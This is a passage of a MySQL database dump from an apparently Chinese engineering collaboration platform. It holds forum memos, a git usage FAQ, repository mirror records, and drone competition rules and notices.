15:53:20',0,0,0,NULL,1,NULL,NULL,NULL,NULL),(356,240,'智能新时代-不一样的人机交互体验','智能新时代什么样的人机交互可能都会出现,颠覆人们的想象!',63,0,NULL,0,0,'2020-09-08 08:10:24','2021-01-27 15:53:20',0,240,NULL,NULL,0,NULL,1,'2021-01-27 15:53:20',0,1,0,NULL,1,NULL,NULL,NULL,NULL),(357,240,'智能新时代-不一样的人机交互体验','可能出现令人惊叹的交互方式!',46,0,NULL,0,0,'2020-09-10 15:08:36','2021-01-27 15:53:19',0,240,NULL,NULL,0,NULL,1,'2021-01-27 15:53:19',0,1,0,NULL,1,NULL,NULL,NULL,NULL),(359,2,'加速人工智能发展,Arm最近做了这三件事……','我们国家一定要迎头赶上啊',55,0,NULL,0,0,'2020-09-18 09:29:49','2021-01-27 15:53:19',0,2,NULL,NULL,0,NULL,1,'2021-01-27 15:53:19',0,0,0,NULL,1,NULL,NULL,NULL,NULL),(367,NULL,'敏感词测试','你也滚蛋!跟你很熟吗?起个这ID来恶心人?',46,0,NULL,0,0,'2021-01-27 17:35:49','2021-01-27 17:35:49',1,NULL,NULL,NULL,1,NULL,1,NULL,0,0,0,NULL,1,0,NULL,0,NULL),(368,NULL,'中国空气动力研究与发展中心介绍','中国空气动力研究与发展中心,即空气动力学国家重点实验室。2008年,科技部基础研究司组织专家召开空气动力学国家重点实验室建设计划可行性论证会议。\n论证专家组由8名国内相关领域知名专家组成,组长为俞鸿儒院士。专家组听取了实验室主任邓小刚研究员关于实验室建设计划的报告,考察了实验室,并与实验室骨干人员进行了座谈。专家组认为:实验室定位明确,名称恰当,主要研究方向符合空气动力学发展趋势;研究单元设置和人员结构合理,稳定和吸引优秀高水平人才措施具体可行;建设经费概算合理,仪器设备购置、配套设施建设计划能够满足国家重点实验室建设的要求。同时专家组指出,实验室应进一步加强对科学问题的凝炼,深入开展基础研究,积极扩大对外交流,并一致同意实验室建设计划方案,建议修改完善后尽快实施。\n空气动力学国家重点实验室是科技部2007年8月批准筹建的国家重点实验室,实验室以国家重大需求为目标,围绕计算空气动力学及飞行器流动机理、低速空气动力学基础问题、国家大型空气动力学基础条件平台关键技术等方向开展研究。',115,0,NULL,0,0,'2021-01-28 18:40:05','2021-01-28 18:40:05',1,NULL,NULL,NULL,1,NULL,1,NULL,0,0,0,NULL,1,1,NULL,0,NULL),(369,NULL,'新闻','大家好',115,0,NULL,0,0,'2021-01-29 07:50:22','2021-01-29 07:50:22',1,NULL,NULL,NULL,1,NULL,1,NULL,0,0,0,NULL,1,1,NULL,13,NULL),(370,NULL,'平台常见问题与解决方法','开源项目模块\n一 创建项目\n 在开源项目板块点击下图所示按钮,填写相关信息,创建项目。 \n \n \n\n二 安装git\n官网教程 https://git-scm.com/book/zh/v2/%E8%B5%B7%E6%AD%A5-%E5%AE%89%E8%A3%85-Git\n\n三 代码克隆\n创建好项目,克隆地址为下图所示地址。\n \n打开命令行 按如图所示方法(其他克隆方式亦可) 克隆到本地仓库。\n \n用户名为下图所示用户名或者您的邮箱,密码为账号密码。\n \n四 推送本地代码到代码库\n 示例方法\n1 git status 查看当前状态。\n红色的字体显示的就是你修改的文件。\n \n2 git add . 或者 git add xxx\n用 git add . 就可以把你的内容全部添加到本地git缓存区中。\n使用git add xxx(上图中的红色文字的文件链接) 就可以提交部分文件到本地git缓存区。\n3 git commit -m \"提交代码\" 推送修改到本地git库中。\n4 git pull <远程主机名> <远程分支名> 取回远程主机某个分支的更新,再与本地的指定分支合并。\n\n5 git push <远程主机名> <远程分支名> 把当前提交到git本地仓库的代码推送到远程主机的某个远程分之上。\n\n五 成为风雷软件的外围协作者\n在开源项目板块搜索PHengLEI,找的风雷项目,需先下载风雷协议,填写完后上传,管理员审核成功后加入风雷项目。\n \n\n\n论坛交流模块\n\n一 发布帖子\n点击‘写点什么’发布帖子\n \n',1,0,NULL,0,0,'2021-03-10 17:03:47','2021-03-10 17:08:35',4,NULL,NULL,NULL,1,NULL,1,NULL,0,0,0,NULL,1,1,NULL,29,NULL);
|
||
/*!40000 ALTER TABLE `memos` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `message_alls`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `message_alls`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `message_alls` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`message_id` int(11) DEFAULT NULL,
|
||
`message_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_message_alls_on_user_id_and_message_id_and_created_at` (`user_id`,`message_id`,`created_at`),
|
||
KEY `index_message_alls_on_message_type` (`message_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `message_alls`
|
||
--
|
||
|
||
LOCK TABLES `message_alls` WRITE;
|
||
/*!40000 ALTER TABLE `message_alls` DISABLE KEYS */;
|
||
INSERT INTO `message_alls` VALUES (1,1,1,'ForgeMessage','2018-08-02 21:30:24','2018-08-02 21:30:24'),(2,59,2,'ForgeMessage','2019-10-31 15:16:02','2019-10-31 15:16:02'),(3,61,3,'ForgeMessage','2019-10-31 15:16:33','2019-10-31 15:16:33'),(4,63,4,'ForgeMessage','2019-11-24 15:10:20','2019-11-24 15:10:20'),(5,66,5,'ForgeMessage','2019-11-24 15:13:52','2019-11-24 15:13:52');
|
||
/*!40000 ALTER TABLE `message_alls` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`board_id` int(11) NOT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`subject` varchar(255) NOT NULL DEFAULT '',
|
||
`content` longtext,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`replies_count` int(11) NOT NULL DEFAULT '0',
|
||
`last_reply_id` int(11) DEFAULT NULL,
|
||
`created_on` datetime NOT NULL,
|
||
`updated_on` datetime NOT NULL,
|
||
`locked` tinyint(1) DEFAULT '0',
|
||
`sticky` int(11) DEFAULT '0',
|
||
`reply_id` int(11) DEFAULT NULL,
|
||
`quotes` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`root_id` int(11) DEFAULT NULL,
|
||
`visits` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `messages_board_id` (`board_id`),
|
||
KEY `messages_parent_id` (`parent_id`),
|
||
KEY `index_messages_on_last_reply_id` (`last_reply_id`),
|
||
KEY `index_messages_on_author_id` (`author_id`),
|
||
KEY `index_messages_on_created_on` (`created_on`),
|
||
KEY `index_messages_on_root_id` (`root_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `messages`
|
||
--
|
||
|
||
LOCK TABLES `messages` WRITE;
|
||
/*!40000 ALTER TABLE `messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `mirrors`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `mirrors`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `mirrors` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`repo_id` int(11) DEFAULT NULL,
|
||
`status` int(11) NOT NULL DEFAULT '0' COMMENT '0 - succeeded, 1 - waiting, 2 - failed',
|
||
`interval` int(11) DEFAULT NULL COMMENT 'mirror interval with unix time',
|
||
`next_update_time` datetime DEFAULT NULL COMMENT 'next update mirror time, for datetime',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sync_num` int(11) DEFAULT '1',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=103 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `mirrors`
|
||
--
|
||
|
||
LOCK TABLES `mirrors` WRITE;
|
||
/*!40000 ALTER TABLE `mirrors` DISABLE KEYS */;
|
||
INSERT INTO `mirrors` VALUES (1,350,1,NULL,NULL,'2020-08-12 08:22:42','2020-08-12 08:22:42',1),(2,351,1,NULL,NULL,'2020-08-12 08:22:42','2020-08-12 08:22:42',1),(3,352,1,NULL,NULL,'2020-08-12 08:23:08','2020-08-12 08:23:08',1),(4,353,1,NULL,NULL,'2020-08-12 08:23:08','2020-08-12 08:23:08',1),(5,354,1,NULL,NULL,'2020-08-12 08:24:04','2020-08-12 08:24:04',1),(6,355,1,NULL,NULL,'2020-08-12 08:24:17','2020-08-12 08:24:17',1),(7,356,1,NULL,NULL,'2020-08-12 08:24:59','2020-08-12 08:24:59',1),(8,357,1,NULL,NULL,'2020-08-12 08:26:05','2020-08-12 08:26:05',1),(9,358,1,NULL,NULL,'2020-08-12 08:27:55','2020-08-12 08:27:55',1),(10,359,1,NULL,NULL,'2020-08-12 08:30:09','2020-08-12 08:30:09',1),(11,360,1,NULL,NULL,'2020-08-12 08:30:09','2020-08-12 08:30:09',1),(12,362,0,NULL,NULL,'2020-08-12 08:41:25','2020-08-12 08:41:26',1),(13,363,1,NULL,NULL,'2020-08-12 08:41:25','2020-08-12 08:41:25',1),(14,364,0,NULL,NULL,'2020-08-12 08:53:51','2020-08-12 08:54:44',1),(15,365,1,NULL,NULL,'2020-08-12 08:53:51','2020-08-12 08:53:51',1),(16,366,0,NULL,NULL,'2020-08-12 08:53:51','2020-08-12 08:54:09',1),(17,367,1,NULL,NULL,'2020-08-12 08:53:51','2020-08-12 08:53:51',1),(18,368,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:46',1),(19,369,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:46',1),(20,370,1,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:45',1),(21,371,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:50',1),(22,372,1,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:45',1),(23,373,1,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:45',1),(24,374,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:58:22',1),(25,375,1,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:57:45',1),(26,376,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 09:07:29',1),(27,377,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 09:02:58',1),(28,378,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:58:56',1),(29,379,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:58:23',1),(30,380,0,NULL,NULL,'2020-08-12 08:57:45','2020-08-12 08:59:23',1),(31,381,1,NULL,NULL,'2020-08-12 08:57:46','2020-08-12 08:57:46',1),(32,382,1,NULL,NULL,'2020-08-12 08:57:46','2020-08-12 08:57:46',1),(33,383,1,NULL,NULL,'2020-08-12 08:57:46','2020-08-12 08:57:46',1),(34,384,0,NULL,NULL,'2020-08-12 08:57:46','2020-08-12 09:00:53',1),(35,385,0,NULL,NULL,'2020-08-12 08:57:50','2020-08-12 08:59:24',1),(36,386,1,NULL,NULL,'2020-08-12 08:58:22','2020-08-12 08:58:22',1),(37,387,1,NULL,NULL,'2020-08-12 08:58:22','2020-08-12 08:58:22',1),(38,388,0,NULL,NULL,'2020-08-12 08:58:22','2020-08-12 09:00:13',1),(39,389,1,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:58:45',1),(40,390,0,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:58:46',1),(41,391,0,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:59:12',1),(42,392,1,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:58:45',1),(43,393,0,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 09:05:07',1),(44,394,1,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:58:45',1),(45,395,0,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 08:58:55',1),(46,396,0,NULL,NULL,'2020-08-12 08:58:45','2020-08-12 09:00:28',1),(47,397,0,NULL,NULL,'2020-08-12 08:58:55','2020-08-12 09:00:25',1),(48,398,0,NULL,NULL,'2020-08-12 08:58:55','2020-08-12 09:00:05',1),(49,399,0,NULL,NULL,'2020-08-12 08:58:55','2020-08-12 09:00:14',1),(50,400,1,NULL,NULL,'2020-08-12 08:58:56','2020-08-12 08:58:56',1),(51,401,1,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 08:59:23',1),(52,402,1,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 08:59:23',1),(53,403,0,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 08:59:57',1),(54,404,0,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 09:00:44',1),(55,405,0,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 09:00:19',1),(56,406,0,NULL,NULL,'2020-08-12 08:59:23','2020-08-12 09:00:39',1),(57,407,1,NULL,NULL,'2020-08-12 08:59:24','2020-08-12 08:59:24',1),(58,408,0,NULL,NULL,'2020-08-12 08:59:57','2020-08-12 09:00:15',1),(59,409,0,NULL,NULL,'2020-08-12 09:00:15','2020-08-12 09:00:17',1),(60,410,0,NULL,NULL,'2020-08-12 09:00:15','2020-08-12 09:00:18',1),(61,411,0,NULL,NULL,'2020-08-12 09:00:19','2020-08-12 09:03:03',1),(62,412,0,NULL,NULL,'2020-08-12 09:00:39','2020-08-12 09:00:40',1),(63,413,0,NULL,NULL,'2020-08-12 09:00:39','2020-08-12 09:00:43',1),(64,414,1,NULL,NULL,'2020-08-12 09:00:48','2020-08-12 09:00:48',1),(65,415,0,NULL,NULL,'2020-08-12 09:00:53','2020-08-12 09:01:09',1),(66,416,0,NULL,NULL,'2020-08-12 09:01:14','2020-08-12 09:01:15',1),(67,417,1,NULL,NULL,'2020-08-12 09:01:14','2020-08-12 09:01:14',1),(68,418,1,NULL,NULL,'2020-08-12 09:01:30','2020-08-12 09:01:30',1),(69,419,0,NULL,NULL,'2020-08-12 09:01:30','2020-08-12 09:01:35',1),(70,420,0,NULL,NULL,'2020-08-12 09:01:30','2020-08-12 09:01:31',1),(71,421,0,NULL,NULL,'2020-08-12 09:01:30','2020-08-12 09:01:31',1),(72,422,1,NULL,NULL,'2020-08-12 09:01:40','2020-08-12 09:01:40',1),(73,423,0,NULL,NULL,'2020-08-12 09:01:50','2020-08-12 09:02:47',1),(74,424,0,NULL,NULL,'2020-08-12 09:02:53','2020-08-12 09:02:54',1),(75,425,0,NULL,NULL,'2020-08-12 09:03:06','2020-08-12 09:03:07',1),(76,426,1,NULL,NULL,'2020-08-12 09:03:26','2020-08-12 09:03:26',1),(77,427,0,NULL,NULL,'2020-08-12 09:04:00','2020-08-12 09:04:06',1),(78,428,0,NULL,NULL,'2020-08-12 09:04:09','2020-08-12 09:04:54',1),(79,429,0,NULL,NULL,'2020-08-12 09:07:46','2020-08-12 09:07:47',1),(80,440,1,NULL,NULL,'2020-08-27 00:55:36','2020-08-27 00:55:36',1),(81,441,1,NULL,NULL,'2020-08-27 01:31:43','2020-08-27 01:31:43',1),(82,442,1,NULL,NULL,'2020-08-27 02:15:14','2020-08-27 02:15:14',1),(83,443,1,NULL,NULL,'2020-08-27 02:18:15','2020-08-27 02:18:15',1),(84,444,1,NULL,NULL,'2020-08-27 02:19:37','2020-08-27 02:19:37',1),(85,445,1,NULL,NULL,'2020-08-27 02:51:30','2020-08-27 02:51:30',1),(86,446,1,NULL,NULL,'2020-08-27 02:54:43','2020-08-27 02:54:43',1),(87,448,1,NULL,NULL,'2020-08-27 03:05:20','2020-08-27 03:05:20',1),(88,449,0,NULL,NULL,'2020-08-27 03:21:38','2020-08-27 03:21:41',1),(89,450,0,NULL,NULL,'2020-08-27 03:25:19','2020-08-27 03:25:26',1),(90,451,0,NULL,NULL,'2020-08-27 03:25:52','2020-08-27 03:34:41',16),(91,452,0,NULL,NULL,'2020-08-27 03:27:07','2020-08-27 03:27:09',1),(92,456,0,NULL,NULL,'2020-10-15 01:06:01','2020-10-15 01:06:04',1),(93,457,1,NULL,NULL,'2020-10-15 01:14:10','2020-10-15 01:14:10',1),(94,458,0,NULL,NULL,'2020-10-15 01:18:08','2020-10-15 01:19:03',1),(95,459,1,NULL,NULL,'2020-10-16 00:17:06','2020-10-16 00:17:06',1),(96,497,0,NULL,NULL,'2021-01-06 00:18:47','2021-01-06 00:18:50',1),(97,498,1,NULL,NULL,'2021-01-06 00:25:46','2021-01-06 00:25:46',1),(98,505,0,NULL,NULL,'2021-01-07 01:07:03','2021-01-07 01:07:04',1),(99,510,0,NULL,NULL,'2021-01-07 02:16:36','2021-01-07 02:16:36',1),(100,527,0,NULL,NULL,'2021-01-18 04:09:37','2021-01-18 04:09:37',1),(101,550,0,NULL,NULL,'2021-02-22 07:39:24','2021-02-22 07:39:24',1),(102,555,0,NULL,NULL,'2021-02-25 02:10:56','2021-02-25 02:11:07',1);
|
||
/*!40000 ALTER TABLE `mirrors` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `news`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `news`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `news` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`title` varchar(60) NOT NULL DEFAULT '',
|
||
`summary` varchar(255) DEFAULT '',
|
||
`description` text,
|
||
`author_id` int(11) NOT NULL DEFAULT '0',
|
||
`created_on` datetime DEFAULT NULL,
|
||
`comments_count` int(11) NOT NULL DEFAULT '0',
|
||
`sticky` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `news_project_id` (`project_id`),
|
||
KEY `index_news_on_author_id` (`author_id`),
|
||
KEY `index_news_on_created_on` (`created_on`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `news`
|
||
--
|
||
|
||
LOCK TABLES `news` WRITE;
|
||
/*!40000 ALTER TABLE `news` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `news` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `no_uses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `no_uses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `no_uses` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`no_use_type` varchar(255) DEFAULT NULL,
|
||
`no_use_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `no_uses`
|
||
--
|
||
|
||
LOCK TABLES `no_uses` WRITE;
|
||
/*!40000 ALTER TABLE `no_uses` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `no_uses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `notices`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `notices`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `notices` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`notice_type` varchar(255) DEFAULT NULL,
|
||
`noticeable_id` int(11) DEFAULT NULL,
|
||
`noticeable_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_notices_on_user_id_and_noticeable_id` (`user_id`,`noticeable_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=34 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `notices`
|
||
--
|
||
|
||
LOCK TABLES `notices` WRITE;
|
||
/*!40000 ALTER TABLE `notices` DISABLE KEYS */;
|
||
INSERT INTO `notices` VALUES (1,50,'请各报名人员注意','我们的竞赛马上就要开始了,请全体人员注意,并积极参与\r\n','notice',6,'Competition','2019-08-13 16:09:45','2020-08-17 15:18:24'),(2,50,NULL,'\r\n1、各参赛队比赛顺序、座次由抽签决定;\r\n2、比赛期间各队要遵守赛场秩序和赛场纪律;\r\n3、各参赛队队员统一服装(可着制服);\r\n4、答题队员要起立回答,回答时一律用普通话;\r\n5、各队在回答问题时,必须完整准确、关键字词不能错答、\r\n漏答。\r\n','rank',6,'Competition','2019-08-13 16:13:48','2020-08-25 14:33:34'),(3,50,NULL,'无人机比赛规则\r\n\r\n一、无人机竞赛目的\r\n随着机器人技术的飞速发展,空中飞行机器人(以下简称无人机)已成为国防建设与国民经济发展中起不可缺少的重要的组成部分, 被广泛应用于军事勘察、航拍、植保等多领域。在此背景下,本届机器人大赛将无人机竞赛作为一种新型比赛项目。 引进无人机竞赛项目的主要目的是: ① 填补机器人竞赛领域中无空中飞行机器人竞赛的空白, 便于推进大众对于无人机的理解;②发现目前无人机技术中存在的问题以及迫切需要解决的技术问题,为我国无人机的快速发展培养技术性人才;③推动无人机在我国的实际应用力度,紧跟国际步伐。\r\n二、无人机竞赛种类\r\n由于本次为第一次无人机竞赛, 主要以遥控赛和基本动作为主, 暂时不设自主类型的比赛项目,项目分为三项:\r\n1) 绕桩赛\r\n2) 平台起降赛\r\n3) 应用航拍赛 \r\n三、无人机竞赛环境以及竞赛道具\r\n1、竞赛环境:\r\n无人机竞赛基本上在室外进行, 在竞赛空间里除了指定的比赛工具之外, 不允许有其它任何障碍物或干扰。\r\n2、竞赛道具的要求:\r\n1) 无人机样式: 垂直起降旋翼无人机 (旋翼数量不限),其最大尺寸 (裸机对角线尺寸)应小于 800 ㎜(直升机为首尾直线长) ,比赛用机可以采用商品机,为促进大学生创新及动手能力, 赛方鼓励自行开发的飞行器,但需要保证不能出现任何安全意外。\r\n2) 比赛机器应采用无刷电机,即玩具级机器不能参赛(包括所有采用空心杯的机器)。\r\n3) 禁止使用闪光、 强光等可能干扰比赛现场观察裁判以及录像回放的灯光设备,禁止使用表演类烟雾。\r\n4) 对于遥控设备以及地面通讯设备应遵循以下几点要求: ①不得干扰其他选手遥控设备正常工作;②不得干扰场内其他电子设备的正常工作;③遥控设备符合国家无线电管制要求。\r\n5) 可以使用穿越机参赛,比赛成绩会延时 40秒。\r\n四 、比赛种类以及比赛规则\r\n本届比赛设三个比赛项目:\r\n一) S形绕桩比赛\r\n该项目主要考验无人机按同一高度进行绕桩飞行的避障操作能力。\r\n比赛流程及其规则:\r\n1) 比赛开始前无人机位于离目标 20m远处的起飞点,起飞点与目标点区间内安置高度 3m的 4 根立柱,立柱间距 5m。起飞点与目标点均是直径1m的圆形。\r\n2) 裁判吹哨后,无人机在参赛选手控制下在 1 分钟内起飞,同时开始计时。无人机上升到 2m高度以上,维持高度飞向目标区,到达目标区绕过 4 根立柱,飞至目标点,然后将无人机降落至目标圆内,计时结束。\r\n3) 无人机以最短时间内完成任务者获胜。裁判记录比赛用时。\r\n4) 扣分项说明:对裁判吹哨后,超过 1 分钟才起飞者比赛用时加 1 分钟;对于碰撞立柱的情况,每碰撞一次加 30 秒;对返回起飞点降落到圆圈外者加 20 秒;降落目标点时降落平稳、机身无晃动的参赛者,比赛成绩为加上扣分项后的计时成绩,不满足此要求成绩加 10 秒。\r\n5) 每个参赛队有 2 次机会,取最短用时为最终比赛成绩;参赛者可选择是否重新飞行,也可自行选择某一次自己满意的成绩。\r\n6) 比赛结束后,裁判当场宣布扣分项,参赛选手有异议应立即向裁判反映,并提供视频录像为证。\r\n二)项目名称:四台起降比赛\r\n该项目主要考验对无人机起降操作的技术。\r\n比赛流程及其规则:\r\n1) 比赛开始前无人机置于起降台附近的起飞点,起降台位于四台起降比赛场中央,分别布置在长 3m的正方形垂直角处,其形状为边长 1 米的正方形,台面上有直径 80㎝的黑色标志圆。在赛场四周用蓝色丝带布置限高绳,限高绳的目的是要求飞行器从一个起降台飞至另一个起降台过程中,升空高度必须高于 1.5m。\r\n2) 当参赛人员准备好后,向裁判发出开始信号,裁判确认参赛者准备完毕后喊开始口号同时开始计时。无人机从第一起降台(离起飞点最近的起降台)开始,按照任意顺序分别在四个起降台上完成起降任务,最终回到第一起降台上,任务完成后裁判判定完全降落后停止计时。对于完全降落的判断,由裁判观察判断飞行器旋翼转速明显下降且已不满足正常起飞,则判断为完全降落。\r\n3) 最终比赛成绩由比赛用时成绩以及操作成绩组成,比赛用时成绩加操作扣分成绩即为最终比赛成绩。\r\n4) 扣分项体现在三个方面:\r\n降落过程中无人机有无弹跳。有以下两种情况均被判断为降落过程中有弹跳发生,①距离台面 30 ㎝内有自由落体现象,如有此现象发生根据情况加 30 秒;②起落架短暂接触地面后重新离地且高度超过 5 ㎝,根据弹跳高度加 30 秒。降落要求平稳,若发生机身晃动,根据情况加 5-15 秒。降落后无人机起落架应完全落在降落圆内,压线和出线都会有扣分,每压线或出线一次加 30 秒。升降过程未超过限高线,加 1 分钟。\r\n5) 每个参赛队有 2 次机会,最终成绩取参赛者最佳成绩。若降落过程中无人机倾翻视为任务失败,失去该次比赛机会;若未降落在指定位置或从起降台上滑落亦视为任务失败,失去该次比赛机会。当参赛队失去该次机会,应在该轮比赛结束后,所有参赛队进行第二次飞行机会时进行重新比赛。若 2 次机会均丧失,参赛队成绩排至该项目最后一名。\r\n6) 比赛结束后,裁判当场宣布扣分项,参赛选手有异议应立即向裁判反映,并提供视频录像为证。\r\n三)项目名称:航拍技术的考验\r\n在无人机上安装高清晰摄像机;建议安装具有稳定效果的云台,参赛队员根据图像传输信号进行飞行作业。\r\n比赛流程及其规则:\r\n1) 比赛开始前无人机位于离拍摄 50m远的起飞点。(起飞点是直径 1m的圆)\r\n2) 裁判发出比赛开始信号后开始计时,无人机在参赛选手控制下在 1 分钟内遥控起飞。\r\n3) 无人机起飞后上升至 10 米高度后水平飞向目标物,到达目标物上方后,先拍目标物的顶端,然后从起飞点看去的正面、左侧面、背面、右侧面等面每距离 2 米拍摄,结束航拍工作,返回降落到起飞点圆圈内,计时结束。\r\n7) 最终比赛成绩由比赛用时成绩以及操作成绩组成,比赛用时成绩加操作扣分成绩即为最终比赛成绩。\r\n4) 扣分项说明:①对裁判吹哨后,超过 1分钟才起飞的情况成绩加 1 分钟;②对返回起飞点降落到升降台圆圈外或压线者,成绩加 30秒;③根据传回的图像晃动严重情况加 10-20 秒。\r\n5) 航拍传回的图像须按裁判员所说明的方式提交给裁判员(提交方式 1:将图像打包发给裁判员;提交方式 2:直接拷贝到裁判员的电脑上),照片不能进行编辑,否则取消比赛资格。\r\n6) 每个参赛队有 2 次机会,最终成绩取参赛者最佳成绩。若降落过程中无人机倾翻视为任务失败,失去该次比赛机会;比赛机会全部丧失,成绩排至该项目最后一名。\r\n7) 比赛结束后,裁判当场宣布扣分项,参赛选手有异议应立即向裁判反映,并提供视频录像为证。\r\n五、参赛说明\r\n1) 在参赛之前,参赛者须详知比赛规则\r\n2) 参赛者须操控无人机在规定比赛区进行比赛\r\n3) 不得将遥控器交与未经训练的非参赛人员、场外观众使用\r\n4) 对于比赛成绩的意见,在赛后到具体成绩公示之前,向组委会提出质疑,双方根据录像做出判断,不得干扰比赛的正常进行\r\n5) 在裁判宣布开始后的五分钟内发动无人机,超时动作不与评分\r\n6) 每项比赛进行之前,参赛队员有 3 分钟调试时间,超出 3 分钟裁判开始计时\r\n7) 参赛选手在进行比赛之前必须调试好机器(包括检查遥控信号的良好情况以及是否受其他干扰信号等等) ,否则比赛中出现意外请自行负责\r\n8) 对于电池需要充电等原因,允许选手申请经过他人比赛一轮或多轮后继续比赛\r\n9) 如发现参赛者有作弊行为,取消比赛资格\r\n10) 对于该届比赛规则,举办方有最终解释权\r\n\r\n','manual',6,'Competition','2019-08-13 16:14:45','2020-08-14 17:02:36'),(4,46,'奖金丰厚','该Logo设计要求体现我创新苑的特色,有时代特色,青春气息有朝气。','notice',7,'Competition','2019-08-14 15:11:54','2019-08-14 15:11:54'),(5,46,NULL,'无人机竞赛参赛手册,在附件中,请自行下载参考执行。','manual',9,'Competition','2019-10-30 17:25:16','2019-10-30 